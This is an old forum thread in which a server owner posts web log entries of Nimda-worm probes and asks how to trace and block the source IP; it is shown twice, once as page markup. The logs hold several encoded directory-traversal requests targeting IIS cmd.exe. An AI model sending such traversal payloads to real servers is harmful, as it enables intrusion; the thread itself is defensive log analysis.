Is there a way to track IP addys that fail an nslookup?

illovich · 03-18-2002, 03:26 PM

Hey all,

I've had some troubling connections from a single domain (155.230.x.x), actually it was a bit ago, but I just noticed all the 404s in my logs. It seems to me like a scriptkiddie was trying to break into my WindowsNT server. Luckily, I was running OS X on it

.

Here's a sample:
155.230.14.11 - - [26/Feb/2002:03:00:02 -0500] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 310
155.230.14.11 - - [26/Feb/2002:03:00:03 -0500] "GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 310
155.230.14.11 - - [26/Feb/2002:03:00:04 -0500] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 310
155.230.14.11 - - [26/Feb/2002:03:00:04 -0500] "GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 310
155.230.14.11 - - [26/Feb/2002:03:00:05 -0500] "GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 294
155.230.14.11 - - [26/Feb/2002:03:00:05 -0500] "GET /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 294
155.230.14.11 - - [26/Feb/2002:03:00:06 -0500] "GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 311
155.230.14.11 - - [26/Feb/2002:03:00:06 -0500] "GET /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 311

I'm assuming that this individual was checking to see if my webserver was vulnerable to some msxploit...apparently one that would ive them access to my C: drive (jokes on them...for a few seperate reasons, as we know).

Anyway, actually 2 questions. One, i would like to report the individual in quesiton to their ISP (I'm assuming from the pattern of connections that they were dialed in via PPP)...but the reverselookup failed, so I don't know how to go further in trying to track down the sysadmin.

Secondly, is there a way to deny access to this domain? Is that even worth bothering with?

Thanks,

ill.

Cadre · 03-18-2002, 08:58 PM

The easiest way to get the owner of the IP address is to lookup the netblock owner of the IP. There is a wonderful site: Geektool's Whois Proxy. Just copy/paste the IP into their proxy and hit the whois button and it will spit back the information.

Looks like the IP 155.230.14.11 is owned by Kyungpook National University. The contact email address listed is: staff@bh.knu.ac.kr

illovich · 03-19-2002, 07:27 AM

Cool, thanks for the tip.

BTW, to anybody who didn't recognize the burst above. A very nice system admin told me that that burst of requests is the nimda virus, out there in netland poking around.

And here I thought it was a scriptkiddy.

03-18-2002, 03:26 PM	#1
illovich Prospect Join Date: Feb 2002 Location: East Coast Posts: 22	Is there a way to track IP addys that fail an nslookup? Hey all, I've had some troubling connections from a single domain (155.230.x.x), actually it was a bit ago, but I just noticed all the 404s in my logs. It seems to me like a scriptkiddie was trying to break into my WindowsNT server. Luckily, I was running OS X on it . Here's a sample: 155.230.14.11 - - [26/Feb/2002:03:00:02 -0500] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 310 155.230.14.11 - - [26/Feb/2002:03:00:03 -0500] "GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 310 155.230.14.11 - - [26/Feb/2002:03:00:04 -0500] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 310 155.230.14.11 - - [26/Feb/2002:03:00:04 -0500] "GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 310 155.230.14.11 - - [26/Feb/2002:03:00:05 -0500] "GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 294 155.230.14.11 - - [26/Feb/2002:03:00:05 -0500] "GET /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 294 155.230.14.11 - - [26/Feb/2002:03:00:06 -0500] "GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 311 155.230.14.11 - - [26/Feb/2002:03:00:06 -0500] "GET /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 311 I'm assuming that this individual was checking to see if my webserver was vulnerable to some msxploit...apparently one that would ive them access to my C: drive (jokes on them...for a few seperate reasons, as we know). Anyway, actually 2 questions. One, i would like to report the individual in quesiton to their ISP (I'm assuming from the pattern of connections that they were dialed in via PPP)...but the reverselookup failed, so I don't know how to go further in trying to track down the sysadmin. Secondly, is there a way to deny access to this domain? Is that even worth bothering with? Thanks, ill. __________________ =========================== http://illovich.com

03-18-2002, 08:58 PM	#2
Cadre Prospect Join Date: Jan 2002 Posts: 36	Geektool's Whois Proxy The easiest way to get the owner of the IP address is to lookup the netblock owner of the IP. There is a wonderful site: Geektool's Whois Proxy. Just copy/paste the IP into their proxy and hit the whois button and it will spit back the information. Looks like the IP 155.230.14.11 is owned by Kyungpook National University. The contact email address listed is: staff@bh.knu.ac.kr

03-19-2002, 07:27 AM	#3
illovich Prospect Join Date: Feb 2002 Location: East Coast Posts: 22	Cool, thanks for the tip. BTW, to anybody who didn't recognize the burst above. A very nice system admin told me that that burst of requests is the nimda virus, out there in netland poking around. And here I thought it was a scriptkiddy. __________________ =========================== http://illovich.com

Thread Tools
Show Printable Version Email this Page
Display Modes	Rate This Thread
Linear Mode Switch to Hybrid Mode Switch to Threaded Mode	Rate This Thread: